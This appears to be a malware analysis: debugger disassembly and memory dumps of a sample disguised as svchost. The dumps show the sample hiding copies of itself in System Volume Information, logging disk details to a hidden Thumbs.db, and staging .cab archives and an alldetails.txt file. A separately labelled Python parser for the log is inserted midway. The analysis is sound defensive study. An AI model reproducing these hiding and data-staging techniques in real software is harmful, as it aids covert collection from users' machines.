0012EE7C 00426108 ASCII “%s\%s”

0012EE78 0012EFB0 ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\drive.tlb”
0012EE7C 00426108 ASCII “%s\%s”
0012EE80 0012EFB0 ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\drive.tlb”
0012EE84 00426010 ASCII “drive.tlb”

00409989 |. 51 |PUSH ECX ; /pLocaltime
0040998A |. FF>|CALL DWORD PTR DS:[<&KERNEL32.GetLocalT>; \GetLocalTime
00409990 |. BF>|MOV EDI,svchost.0042A10C

0012EE84 0012EEE8 \pLocaltime = 0012EEE8

Manipulation Functions :
0040CCA0 /$ 8B>MOV EAX,DWORD PTR SS:[ESP+C]
0040CCA4 |. 53 PUSH EBX
0040CCA5 |. 8B>MOV EBX,ECX
0040CCA7 |. 55 PUSH EBP
0040CCA8 |. 8B>MOV EBP,DWORD PTR SS:[ESP+10]
0040CCAC |. 33>XOR ECX,ECX
0040CCAE |. 3B>CMP EBP,ECX
0040CCB0 |. 89>MOV DWORD PTR DS:[EBX+38],ECX
0040CCB3 |. 89>MOV DWORD PTR DS:[EBX+3C],ECX
0040CCB6 |. C7>MOV DWORD PTR DS:[EBX+40],20
0040CCBD |. 89>MOV DWORD PTR DS:[EBX+44],EAX
0040CCC0 |. 0F>JE svchost.0040CD56
0040CCC6 |. 83>AND EAX,6
0040CCC9 |. 3C>CMP AL,6
0040CCCB |. 0F>JE svchost.0040CD56
0040CCD1 |. 3B>CMP EBP,ECX
0040CCD3 |. 8B>MOV EAX,EBP
0040CCD5 |. 7D>JGE SHORT svchost.0040CCD9
0040CCD7 |. 33>XOR EAX,EAX
0040CCD9 |> 56 PUSH ESI
0040CCDA |. 57 PUSH EDI
0040CCDB |. 50 PUSH EAX
0040CCDC |. E8>CALL svchost.004125C6
0040CCE1 |. 8B>MOV ESI,DWORD PTR SS:[ESP+18]
0040CCE5 |. 8B>MOV ECX,EBP
0040CCE7 |. 8B>MOV EDX,ECX
0040CCE9 |. 8B>MOV EDI,EAX
0040CCEB |. C1>SHR ECX,2
0040CCEE |. F3>REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
0040CCF0 |. 8B>MOV ECX,EDX
0040CCF2 |. 83>ADD ESP,4
0040CCF5 |. 83>AND ECX,3
0040CCF8 |. F3>REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
0040CCFA |. 8D>LEA ECX,DWORD PTR DS:[EAX+EBP]
0040CCFD |. 5F POP EDI
0040CCFE |. 89>MOV DWORD PTR DS:[EBX+3C],ECX
0040CD01 |. 8A>MOV CL,BYTE PTR DS:[EBX+44]
0040CD04 |. F6>TEST CL,4
0040CD07 |. 5E POP ESI
0040CD08 |. 75>JNZ SHORT svchost.0040CD19
0040CD0A |. 8B>MOV EDX,DWORD PTR DS:[EBX+C]
0040CD0D |. 89>MOV DWORD PTR DS:[EDX],EAX
0040CD0F |. 8B>MOV ECX,DWORD PTR DS:[EBX+1C]
0040CD12 |. 89>MOV DWORD PTR DS:[ECX],EAX
0040CD14 |. 8B>MOV EDX,DWORD PTR DS:[EBX+2C]
0040CD17 |. 89>MOV DWORD PTR DS:[EDX],EBP
0040CD19 |> F6>TEST BYTE PTR DS:[EBX+44],2
0040CD1D |. 75>JNZ SHORT svchost.0040CD49
0040CD1F |. 8B>MOV ECX,DWORD PTR DS:[EBX+10]
0040CD22 |. 89>MOV DWORD PTR DS:[ECX],EAX
0040CD24 |. 8B>MOV EDX,DWORD PTR DS:[EBX+20]
0040CD27 |. 89>MOV DWORD PTR DS:[EDX],EAX
0040CD29 |. 8B>MOV ECX,DWORD PTR DS:[EBX+30]
0040CD2C |. 89>MOV DWORD PTR DS:[ECX],EBP
0040CD2E |. 8B>MOV EDX,DWORD PTR DS:[EBX+1C]
0040CD31 |. 83>CMP DWORD PTR DS:[EDX],0
0040CD34 |. 75>JNZ SHORT svchost.0040CD49
0040CD36 |. 8B>MOV ECX,DWORD PTR DS:[EBX+C]
0040CD39 |. 89>MOV DWORD PTR DS:[ECX],EAX
0040CD3B |. 8B>MOV EDX,DWORD PTR DS:[EBX+1C]
0040CD3E |. 89>MOV DWORD PTR DS:[EDX],EAX
0040CD40 |. 8B>MOV EAX,DWORD PTR DS:[EBX+2C]
0040CD43 |. C7>MOV DWORD PTR DS:[EAX],0
0040CD49 |> 8B>MOV EAX,DWORD PTR DS:[EBX+44]
0040CD4C |. 5D POP EBP
0040CD4D |. 0C>OR AL,1
0040CD4F |. 89>MOV DWORD PTR DS:[EBX+44],EAX
0040CD52 |. 5B POP EBX
0040CD53 |. C2>RETN 0C
0040CD56 |> 8B>MOV EDX,DWORD PTR DS:[EBX+C]
0040CD59 |. 5D POP EBP
0040CD5A |. 89>MOV DWORD PTR DS:[EDX],ECX
0040CD5C |. 8B>MOV EAX,DWORD PTR DS:[EBX+1C]
0040CD5F |. 89>MOV DWORD PTR DS:[EAX],ECX
0040CD61 |. 8B>MOV EDX,DWORD PTR DS:[EBX+2C]
0040CD64 |. 89>MOV DWORD PTR DS:[EDX],ECX
0040CD66 |. 8B>MOV EAX,DWORD PTR DS:[EBX+10]
0040CD69 |. 89>MOV DWORD PTR DS:[EAX],ECX
0040CD6B |. 8B>MOV EDX,DWORD PTR DS:[EBX+20]
0040CD6E |. 89>MOV DWORD PTR DS:[EDX],ECX
0040CD70 |. 8B>MOV EAX,DWORD PTR DS:[EBX+30]
0040CD73 |. 5B POP EBX
0040CD74 |. 89>MOV DWORD PTR DS:[EAX],ECX

resulting in :

008B08F8 70 00 05 00 EC 07 20 00 p….. .
008B0900 4C 43 5F 43 4F 4C 4C 41 LC_COLLA
008B0908 54 45 3D 43 3B 4C 43 5F TE=C;LC_
008B0910 43 54 59 50 45 3D 43 3B CTYPE=C;
008B0918 4C 43 5F 4D 4F 4E 45 54 LC_MONET
008B0920 41 52 59 3D 43 3B 4C 43 ARY=C;LC
008B0928 5F 4E 55 4D 45 52 49 43 _NUMERIC
008B0930 3D 43 3B 4C 43 5F 54 49 =C;LC_TI
008B0938 4D 45 3D 43 00 F0 AD BA ME=C….
008B0940 0D F0 AD BA 0D F0 AD BA ……..
0012EC3C 008B0900 ASCII “LC_COLLATE=C;LC_CTYPE=C;LC_MONETARY=C;LC_NUMERIC=C;LC_TIME=C”

00416180 |> 8B>/MOV EAX,DWORD PTR DS:[ECX]
00416182 |. BA>|MOV EDX,7EFEFEFF
00416187 |. 03>|ADD EDX,EAX
00416189 |. 83>|XOR EAX,FFFFFFFF
0041618C |. 33>|XOR EAX,EDX
0041618E |. 83>|ADD ECX,4
00416191 |. A9>|TEST EAX,81010100
00416196 |.^74>|JE SHORT svchost.00416180
00416198 |. 8B>|MOV EAX,DWORD PTR DS:[ECX-4]
0041619B |. 84>|TEST AL,AL

Decryption loop above.

0012EE7C 0012F9D8 |ExistingFileName = “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0012EE80 0012F2BC |NewFileName = “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\KB946625.tmp”
0012EE84 00000000 \FailIfExists = FALSE

00409F3C |. 8B>|MOV ESI,DWORD PTR DS:[<&KERNEL32.CopyFi>; kernel32.CopyFileA
00409F42 |. 8D>|LEA EDX,DWORD PTR SS:[ESP+434]
00409F49 |. 53 |PUSH EBX ; /FailIfExists
00409F4A |. 8D>|LEA EAX,DWORD PTR SS:[ESP+B54] ; |
00409F51 |. 52 |PUSH EDX ; |NewFileName
00409F52 |. 50 |PUSH EAX ; |ExistingFileName
00409F53 |. FF>|CALL ESI ; \CopyFileA
00409F55 |. 8D>|LEA ECX,DWORD PTR SS:[ESP+434]
00409F5C |. 6A>|PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
00409F5E |. 51 |PUSH ECX ; |FileName
00409F5F |. FF>|CALL EBP ; \SetFileAttributesA
00409F61 |. 8D>|LEA EDX,DWORD PTR SS:[ESP+740]
00409F68 |. 53 |PUSH EBX
00409F69 |. 52 |PUSH EDX

New function further down:

00409FC4 |> A0>|MOV AL,BYTE PTR DS:[42A274]
00409FC9 |. 8A>|MOV CL,BYTE PTR DS:[42A275]
00409FCF |. 8A>|MOV DL,BYTE PTR DS:[42A276]
00409FD5 |. 89>|MOV DWORD PTR SS:[ESP+1C],EBX
00409FD9 |. 88>|MOV BYTE PTR SS:[ESP+1C],AL

0012EE74 0012EEA4 |RootPathName = “C:\”
0012EE78 0012EEBC |pSectorsPerCluster = 0012EEBC
0012EE7C 0012EEC0 |pBytesPerSector = 0012EEC0
0012EE80 0012EEC4 |pFreeClusters = 0012EEC4
0012EE84 0012EEE0 \pClusters = 0012EEE0
0012EE88 7C822CFB RETURN to kernel32.GetDriveTypeA

00409FF2 |. 51 |PUSH ECX ; |pFreeClusters
00409FF3 |. 8D>|LEA EAX,DWORD PTR SS:[ESP+3C] ; |
00409FF7 |. 52 |PUSH EDX ; |pBytesPerSector
00409FF8 |. 8D>|LEA ECX,DWORD PTR SS:[ESP+28] ; |
00409FFC |. 50 |PUSH EAX ; |pSectorsPerCluster
00409FFD |. 51 |PUSH ECX ; |RootPathName
00409FFE |. 88>|MOV BYTE PTR SS:[ESP+33],BL ; |
0040A002 |. FF>|CALL DWORD PTR DS:[<&KERNEL32.GetDiskFr>; \GetDiskFreeSpaceA
0040A008 |. 8B>|MOV EDX,DWORD PTR SS:[ESP+34]

0040A039 |> 68>|PUSH svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\log”
0040A03E |. E8>|CALL svchost.0040D230
0040A043 |. 8B>|MOV ECX,DWORD PTR SS:[ESP+38]
0040A047 |. 83>|ADD ESP,4
0040A04A |. 0F>|IMUL ECX,DWORD PTR SS:[ESP+38]
0040A04F |. 0F>|IMUL ECX,DWORD PTR SS:[ESP+3C]
0040A054 |. 8D>|LEA EDI,DWORD PTR SS:[ESP+948]
0040A05B |. 68>|PUSH svchost.00426060 ; ASCII “_restore{26864C17-18DD-4561-8411}”
0040A060 |. 8D>|LEA EBP,DWORD PTR DS:[EAX+ECX+F3800000]
0040A067 |. B9>|MOV ECX,41
0040A06C |. 33>|XOR EAX,EAX
0040A06E |. 8D>|LEA EDX,DWORD PTR SS:[ESP+18]
0040A072 |. F3>|REP STOS DWORD PTR ES:[EDI]
0040A074 |. 68>|PUSH svchost.00426020 ; ASCII “System_Volume_Information”
0040A079 |. 52 |PUSH EDX
0040A07A |. 8D>|LEA EAX,DWORD PTR SS:[ESP+954]

0012EE78 0012F0B4 ASCII “C:\Documents and Settings\VICTOR\Desktop\list.tlb”
0012EE7C 00426108 ASCII “%s\%s”
0012EE80 0012F4C4 ASCII “C:\Documents and Settings\VICTOR\Desktop”
0012EE84 00425FE4 ASCII “list.tlb”

0012EB14 0012F0B4 |FileName = “C:\Documents and Settings\VICTOR\Desktop\list.tlb”
0012EB18 C0000000 |Access = GENERIC_READ|GENERIC_WRITE
0012EB1C 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0012EB20 0012EB3C |pSecurity = 0012EB3C
0012EB24 00000004 |Mode = OPEN_ALWAYS
0012EB28 00000080 |Attributes = NORMAL
0012EB2C 00000000 \hTemplateFile = NULL
0012EB30 00425D33 svchost.00425D33

0041289D |. EB>JMP SHORT svchost.004128DD
0041289F |> 6A>PUSH 0 ; /hTemplateFile = NULL
004128A1 |. 56 PUSH ESI ; |Attributes
004128A2 |. FF>PUSH DWORD PTR SS:[EBP-8] ; |Mode
004128A5 |. 8D>LEA EAX,DWORD PTR SS:[EBP-1C] ; |
004128A8 |. 50 PUSH EAX ; |pSecurity
004128A9 |. FF>PUSH DWORD PTR SS:[EBP-10] ; |ShareMode
004128AC |. FF>PUSH DWORD PTR SS:[EBP-C] ; |Access
004128AF |. FF>PUSH DWORD PTR SS:[EBP+8] ; |FileName
004128B2 |. FF>CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA
004128B8 |. 8B>MOV ESI,EAX

EBX=00000000
EAX=008B1FD1, (ASCII “C:\Documents and Settings\VICTOR\Desktop\log\Thumbs.db”)
0012EBB0 0012ED5C |Arg1 = 0012ED5C
0012EBB4 00000104 |Arg2 = 00000104
0012EBB8 00428DF0 \Arg3 = 00428DF0

00408E53 |> 55 |/PUSH EBP ; /Arg3
00408E54 |. 8D>||LEA ECX,DWORD PTR SS:[ESP+1A4] ; |
00408E5B |. 68>||PUSH 104 ; |Arg2 = 00000104
00408E60 |. 51 ||PUSH ECX ; |Arg1
00408E61 |. E8>||CALL svchost.00413F16 ; \svchost.00413F16

00412A34 |> 8D>LEA EAX,DWORD PTR SS:[EBP-C]
00412A37 |. 6A>PUSH 0 ; /pOverlapped = NULL
00412A39 |. 50 PUSH EAX ; |pBytesRead
00412A3A |. 8B>MOV EAX,DWORD PTR DS:[EBX] ; |
00412A3C |. FF>PUSH DWORD PTR SS:[EBP+10] ; |BytesToRead
00412A3F |. 51 PUSH ECX ; |Buffer
00412A40 |. FF>PUSH DWORD PTR DS:[EAX+ESI] ; |hFile
00412A43 |. FF>CALL DWORD PTR DS:[<&KERNEL32.ReadFile>] ; \ReadFile

00414423 |> F7>NEG EAX
00414425 |. 1B>SBB EAX,EAX
00414427 |. 83>AND EAX,10
0041442A |. 83>ADD EAX,10
0041442D |. 09>OR DWORD PTR DS:[ESI+C],EAX
00414430 |. 83>AND DWORD PTR DS:[ESI+4],0
00414434 |> 83>OR EAX,FFFFFFFF
00414437 |. 5E POP ESI
00414438 \. C3 RETN

0012E748 00000054 |hFile = 00000054
0012E74C 008B2170 |Buffer = 008B2170
0012E750 0000000B |nBytesToWrite = B (11.)
0012E754 0012EB70 |pBytesWritten = 0012EB70
0012E758 00000000 \pOverlapped = NULL

00412CE5 |> 8D>LEA ECX,DWORD PTR SS:[EBP-C]
00412CE8 |. 57 PUSH EDI ; /pOverlapped
00412CE9 |. 51 PUSH ECX ; |pBytesWritten
00412CEA |. FF>PUSH DWORD PTR SS:[EBP+10] ; |nBytesToWrite
00412CED |. FF>PUSH DWORD PTR SS:[EBP+C] ; |Buffer
00412CF0 |. FF>PUSH DWORD PTR DS:[EAX] ; |hFile
00412CF2 |. FF>CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>; \WriteFile

008B2170 5C 54 68 75 6D 62 73 2E \Thumbs.
008B2178 64 62 0A BA 0D F0 AD BA db……
008B2180 0D F0 AD BA 0D F0 AD BA ……..

Contents of Thumbs.db :

2011-11-11 6:25:50..Name : ..Seri : 747697999..Tota : 2135797760..Free : 3112579072…

Reference :
[Date : Time : Serial : Total Root Disk Size : Free Space :]
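The Thumbs.db record format above, parsed by an added helper (example code, not the worm's or the author's; `parse_record` and `volume_size_as_logged` are names chosen here, and the sample record is constructed from the dump above with CRLF in place of the dots). The disassembly computes Total and Free with a chain of 32-bit IMULs, so the helper reproduces that truncated product and flags a record whose Free exceeds Total as inconsistent instead of trusting it.

```python
import re
from datetime import datetime

# Constructed from the Thumbs.db record shown above; the debugger rendered the
# CRLF separators as dots.
SAMPLE_RECORD = (
    "2011-11-11 6:25:50\r\nName : \r\nSeri : 747697999\r\n"
    "Tota : 2135797760\r\nFree : 3112579072\r\n"
)
FIELD_RE = re.compile(r"^(Name|Seri|Tota|Free)\s*:\s*(.*)$")


def parse_record(text: str) -> dict:
    """Turn one logged record into typed fields plus a consistency flag."""
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    if not lines:
        raise ValueError("empty record")
    # First line is the local timestamp as written by the sample (hour not zero-padded).
    stamp = datetime.strptime(lines[0], "%Y-%m-%d %H:%M:%S")
    fields = {}
    for line in lines[1:]:
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    serial = int(fields["Seri"]) if fields.get("Seri") else None
    total = int(fields["Tota"]) if fields.get("Tota") else None
    free = int(fields["Free"]) if fields.get("Free") else None
    return {
        "timestamp": stamp,
        "volume_name": fields.get("Name", ""),
        "serial": serial,
        # Explorer shows the DWORD volume serial as XXXX-XXXX; handy for matching a seized drive.
        "serial_hex": f"{serial >> 16:04X}-{serial & 0xFFFF:04X}" if serial is not None else None,
        "total_bytes": total,
        "free_bytes": free,
        # Free space can never exceed capacity; when it does, the 32-bit product wrapped.
        "size_wrapped": total is not None and free is not None and free > total,
    }


def volume_size_as_logged(sectors_per_cluster: int, bytes_per_sector: int, clusters: int) -> int:
    """Reproduce the sample's IMUL chain: a 32-bit product, truncated modulo 2**32."""
    return (sectors_per_cluster * bytes_per_sector * clusters) & 0xFFFFFFFF


if __name__ == "__main__":
    record = parse_record(SAMPLE_RECORD)
    for key, value in record.items():
        print(f"{key:>12}: {value}")
```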

0012EE80 0012F0B4 |FileName = “C:\Documents and Settings\VICTOR\Desktop\list.tlb”
0012EE84 00000006 \FileAttributes = HIDDEN|SYSTEM
0012EE88 7C822CFB RETURN to kernel32.GetDriveTypeA

0040A112 |. 8D>|LEA ECX,DWORD PTR SS:[ESP+22C]
0040A119 |. 6A>|PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
0040A11B |. 51 |PUSH ECX ; |FileName
0040A11C |. FF>|CALL DWORD PTR DS:[<&KERNEL32.SetFileAt>; \SetFileAttributesA
0040A122 |> 8D>|LEA EDX,DWORD PTR SS:[ESP+22C]

0012EBFC 00000054 |hFile = 00000054
0012EC00 008B1FD0 |Buffer = 008B1FD0
0012EC04 00001000 |BytesToRead = 1000 (4096.)
0012EC08 0012EC1C |pBytesRead = 0012EC1C
0012EC0C 00000000 \pOverlapped = NULL

Contents of list.tlb :

\Thumbs.db.

 
Next focus, the cab file:

0040A5A1 > 89>MOV DWORD PTR SS:[EBP-4],ESI
0040A5A4 . 39>CMP DWORD PTR DS:[42A580],ESI
0040A5AA . 75>JNZ SHORT svchost.0040A5F2
0040A5AC . C7>MOV DWORD PTR DS:[42A580],1
0040A5B6 . E8>CALL svchost.0040EC20 ; To cab through SEH-II
0040A5BB . 89>MOV DWORD PTR DS:[42A580],ESI
0040A5C1 . 68>PUSH 1B7740 ; /Timeout = 1800000. ms
0040A5C6 . FF>CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
0040A5CC . C7>MOV DWORD PTR SS:[EBP-4],-1
0040A5D3 .^EB>JMP SHORT svchost.0040A5A1
0040A5D5 . C7>MOV DWORD PTR DS:[42A580],0
0040A5DF . 68>PUSH 0EA60 ; /Timeout = 60000. ms
0040A5E4 . FF>CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
0040A5EA . B8>MOV EAX,svchost.0040A5F0
0040A5EF . C3 RETN

0012F588 0012F5FC |RootPathName = “C:\”
0012F58C 0012F624 |pSectorsPerCluster = 0012F624
0012F590 0012F61C |pBytesPerSector = 0012F61C
0012F594 0012F618 |pFreeClusters = 0012F618
0012F598 0012F760 \pClusters = 0012F760
0012F59C 7C822CFB RETURN to kernel32.GetDriveTypeA

0040ECD0 |. 5>PUSH EAX ; /pClusters
0040ECD1 |. 8>LEA EDX,DWORD PTR SS:[ESP+84] ; |
0040ECD8 |. 5>PUSH ECX ; |pFreeClusters
0040ECD9 |. 8>LEA EAX,DWORD PTR SS:[ESP+90] ; |
0040ECE0 |. 5>PUSH EDX ; |pBytesPerSector
0040ECE1 |. 8>LEA ECX,DWORD PTR SS:[ESP+6C] ; |
0040ECE5 |. 5>PUSH EAX ; |pSectorsPerCluster
0040ECE6 |. 5>PUSH ECX ; |RootPathName
0040ECE7 |. C>MOV BYTE PTR SS:[ESP+58],0 ; |
0040ECEC |. 6>MOV WORD PTR SS:[ESP+59],BP ; |
0040ECF1 |. 8>MOV DWORD PTR SS:[ESP+84],EBP ; |
0040ECF8 |. 8>MOV DWORD PTR SS:[ESP+78],EBP ; |
0040ECFC |. C>MOV DWORD PTR SS:[ESP+98],104 ; |
0040ED07 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetDiskFre>; \GetDiskFreeSpaceA
0040ED0D |. 8>MOV EDX,DWORD PTR SS:[ESP+88]
0040ED14 |. 0>IMUL EDX,DWORD PTR SS:[ESP+80]
0040ED1C |. 0>IMUL EDX,DWORD PTR SS:[ESP+7C]
0040ED21 |. 8>CMP EDX,0C800000 ; compare against this value
0040ED27 |. 0>JNB svchost.0040EDD2 ; jump to cab I
0040ED2D |. 8>MOV EAX,DWORD PTR SS:[ESP+28]
0040EDD8 |. E>CALL svchost.00413E46
0040EDDD |. 8>ADD ESP,8
0040EDE0 |. 8>CMP EAX,-1
0040EDE3 |. 7>JNZ SHORT svchost.0040EDFE
0040EDE5 |. 5>PUSH EBP ; /pSecurity
0040EDE6 |. 6>PUSH svchost.0042A170 ; |Path = “C:\WINDOWS\log”
0040EDEB |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateDire>; \CreateDirectoryA
0040EDF1 |. 6>PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
0040EDF3 |. 6>PUSH svchost.0042A170 ; |FileName = “C:\WINDOWS\log”
0040EDF8 |. F>CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
0040EDFE |> 8>LEA EAX,DWORD PTR SS:[ESP+10]
0040EE02 |. 5>PUSH EAX ; /pLocaltime
0040EE03 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetLocalTi>; \GetLocalTime

0040EE02 |. 5>PUSH EAX ; /pLocaltime = 0012F5AC
0040EE03 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetLocalTi>; \GetLocalTime
0040EE09 |. 8>LEA ECX,DWORD PTR SS:[ESP+74]

0012F594 0012F5AC |pSystemTime = 0012F5AC
0012F598 0012F610 \pFileTime = 0012F610

0040EE11 |. 5>PUSH ECX ; /pFileTime
0040EE12 |. 5>PUSH EDX ; |pSystemTime
0040EE13 |. F>CALL DWORD PTR DS:[<&KERNEL32.SystemTime>; \SystemTimeToFileTime
0040EE19 |. B>MOV ECX,41

0012F648 43 3A 5C 57 49 4E 44 4F C:\WINDO
0012F650 57 53 5C 6C 6F 67 5C 32 WS\log\2
0012F658 30 31 31 00 00 00 00 00 011…..
0012F660 00 00 00 00 00 00 00 00 ……..
0012F668 00 00 00 00 00 00 00 00 ……..

Name Building loop:

0040EECC |> 8>LEA ECX,DWORD PTR SS:[ESP+B8]
0040EED3 |. 5>PUSH ECX
0040EED4 |. E>CALL svchost.004130C0
0040EED9 |. 8>MOV EDX,DWORD PTR SS:[ESP+28]
0040EEDD |. 8>ADD ESP,10
0040EEE0 |. 6>CMP WORD PTR SS:[ESP+18],SI
0040EEE5 |. 7>JB SHORT svchost.0040EEFD
0040EEE7 |. 8>AND EDX,0FFFF
0040EEED |. 8>LEA EAX,DWORD PTR SS:[ESP+AC]
0040EEF4 |. 5>PUSH EDX
0040EEF5 |. 5>PUSH EAX
0040EEF6 |. 6>PUSH svchost.00426438 ; ASCII “%s%d”
0040EEFB |. E>JMP SHORT svchost.0040EF11

 

004163A1 |> 8>/MOV ECX,DWORD PTR SS:[EBP-3C]
004163A4 |. B>|MOV EDX,200
004163A9 |. B>|MOV EDI,800
004163AE |> 8> CMP DWORD PTR SS:[EBP-14],0
004163B2 |. 0>|JL svchost.00416AE3
004163B8 |. 8>|CMP BL,20
004163BB |. 7>|JL SHORT svchost.004163D0
004163BD |. 8>|CMP BL,78
004163C0 |. 7>|JG SHORT svchost.004163D0
004163C2 |. 0>|MOVSX EAX,BL
004163C5 |. 8>|MOV AL,BYTE PTR DS:[EAX+421304]
004163CB |. 8>|AND EAX,0F
004163CE |. E>|JMP SHORT svchost.004163D2

 

004167A9 |> 8>|SUB EAX,69
004167AC |. 0>|JE svchost.00416882
004167B2 |. 8>|SUB EAX,5
004167B5 |. 0>|JE svchost.00416858
004167BB |. 4>|DEC EAX
004167BC |. 0>|JE svchost.00416846
004167C2 |. 4>|DEC EAX
004167C3 |. 7>|JE SHORT svchost.00416816
004167C5 |. 8>|SUB EAX,3
004167C8 |.^0>|JE svchost.004165AE
004167CE |. 4>|DEC EAX
004167CF |. 4>|DEC EAX
004167D0 |. 0>|JE svchost.00416886
004167D6 |. 8>|SUB EAX,3
004167D9 |. 0>|JNZ svchost.004169C1

 

0012F642 43 3A C:
0012F64A 5C 57 49 4E 44 4F 57 53 \WINDOWS
0012F652 5C 6C 6F 67 5C 32 30 31 \log\201
0012F65A 31 31 31 31 31 30 36 35 11111065
0012F662 32 00 00 00 00 00 00 00 2…….
0012F66A 00 00 00 00 00 00 ……

0040EF7E |. 5>PUSH EDX
0040EF7F |. 5>PUSH EAX
0040EF80 |. 6>PUSH svchost.00426424 ; ASCII “%s%d.cab”
0040EF85 |. E>JMP SHORT svchost.0040EF9B
0040EF87 |> 8>AND EDX,0FFFF

0012F590 00426424 ASCII “%s%d.cab”
0012F594 0012F648 ASCII “C:\WINDOWS\log\201111110652”
0012F598 0000000C

0012F7A8 43 3A 5C 44 4F 43 55 4D C:\DOCUM
0012F7B0 45 7E 31 5C 56 49 43 54 E~1\VICT
0012F7B8 4F 52 5C 4C 4F 43 41 4C OR\LOCAL
0012F7C0 53 7E 31 5C 54 65 6D 70 S~1\Temp
0012F7C8 5C 00 00 00 00 00 00 00 \…….

0040EFB9 |. 8>LEA EDI,DWORD PTR SS:[ESP+20C]
0040EFC0 |. 5>PUSH EDX ; /Buffer
0040EFC1 |. F>REP STOS DWORD PTR ES:[EDI] ; |
0040EFC3 |. 6>PUSH 104 ; |BufSize = 104 (260.)
0040EFC8 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetTempPat>; \GetTempPathA
0040EFCE |. 8>LEA EAX,DWORD PTR SS:[ESP+20C]
0040EFD5 |. 8>LEA ECX,DWORD PTR SS:[ESP+20C]
0040EFDC |. 5>PUSH EAX
0040EFDD |. 6>PUSH svchost.00426500 ; ASCII “%salldetails.txt”
0040EFE2 |. 5>PUSH ECX
0040EFE3 |. E>CALL svchost.004130C0

0012F590 0012F7A8 ASCII “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\alldetails.txt”
0012F594 00426500 ASCII “%salldetails.txt”

0012F648 43 3A 5C 57 49 4E 44 4F C:\WINDO
0012F650 57 53 5C 6C 6F 67 5C 32 WS\log\2
0012F658 30 31 31 31 31 31 31 30 01111110
0012F660 36 35 32 31 32 2E 63 61 65212.ca
0012F668 62 00 00 00 00 00 00 00 b…….
004018E0 |. 8>MOV EAX,ECX
004018E2 |. 8>MOV ESI,EDI
004018E4 |. 8>MOV EDI,DWORD PTR SS:[ESP+10]
004018E8 |. C>SHR ECX,2
004018EB |. F>REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
004018ED |. 8>MOV ECX,EAX
004018EF |. 8>AND ECX,3
004018F2 |. F>REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
004018F4 |. 8>MOV ESI,EDX
004018F6 |. 8>LEA EDX,DWORD PTR SS:[ESP+24]
004018FA |. 2>SUB ESI,EBP

Operations on the cab file name string:

Finally, the cab creation code:

004019C3 |. 6>PUSH svchost.004016B0
004019C8 |. 6>PUSH svchost.004016A0
004019CD |. 6>PUSH svchost.00401680
004019D2 |. 6>PUSH svchost.00401670
004019D7 |. 6>PUSH svchost.00401650
004019DC |. 6>PUSH svchost.00401630
004019E1 |. 6>PUSH svchost.00401610
004019E6 |. 6>PUSH svchost.00401600
004019EB |. 6>PUSH svchost.004015F0
004019F0 |. 6>PUSH svchost.00401720
004019F5 |. 5>PUSH EDX
004019F6 |. E>CALL <JMP.&CABINET.FCICreate>

The data structure range in memory:

004015F0 8B 44 24 04 50 E8 DA 0F .D$.P…
004015F8 01 00 83 C4 04 C3 90 90 ……..
00401600 8B 44 24 04 50 E8 7C 10 .D$.P.|.
00401608 01 00 59 C3 90 90 90 90 ..Y…..
00401610 8B 44 24 0C 8B 4C 24 08 .D$..L$.
00401618 8B 54 24 04 50 51 52 E8 .T$.PQR.
00401620 CB 10 01 00 83 C4 0C C3 ……..
00401628 90 90 90 90 90 90 90 90 ……..
00401630 8B 44 24 0C 8B 4C 24 08 .D$..L$.
00401638 8B 54 24 04 50 51 52 E8 .T$.PQR.
00401640 7B 13 01 00 83 C4 0C C3 {…….
00401648 90 90 90 90 90 90 90 90 ……..
00401650 8B 44 24 0C 8B 4C 24 08 .D$..L$.
00401658 8B 54 24 04 50 51 52 E8 .T$.PQR.
00401660 51 15 01 00 83 C4 0C C3 Q…….
00401668 90 90 90 90 90 90 90 90 ……..
00401670 8B 44 24 04 50 E8 E8 16 .D$.P…
00401678 01 00 83 C4 04 C3 90 90 ……..
00401680 8B 44 24 0C 8B 4C 24 08 .D$..L$.
00401688 8B 54 24 04 50 51 52 E8 .T$.PQR.
00401690 81 17 01 00 83 C4 0C C3 ……..
00401698 90 90 90 90 90 90 90 90 ……..
004016A0 8B 44 24 04 50 E8 05 18 .D$.P…
004016A8 01 00 83 C4 04 C3 90 90 ……..
004016B0 57 68 BC 52 42 00 68 0C Wh.RB.h.
004016B8 A1 42 00 E8 19 18 01 00 .B……
004016C0 8B D0 83 C4 08 85 D2 74 …….t
004016C8 50 8B FA 83 C9 FF 33 C0 P…..3.
004016D0 F2 AE 8B 44 24 0C F7 D1 .®.D$…
004016D8 49 3B C8 73 33 8B FA 83 I;.s3…
004016E0 C9 FF 33 C0 56 F2 AE F7 ..3.V.®.
004016E8 D1 2B F9 52 8B C1 8B F7 .+.R….
004016F0 8B 7C 24 10 C1 E9 02 F3 .|$…..
004016F8 A5 8B C8 83 E1 03 F3 A4 ……..
00401700 E8 81 0F 01 00 83 C4 04 ……..
00401708 B8 01 00 00 00 5E 5F C3 …..^_.
00401710 52 E8 70 0F 01 00 83 C4 R.p…..
00401718 04 33 C0 5F C3 90 90 90 .3._….
00401720 33 C0 C3 90 90 90 90 90 3…….
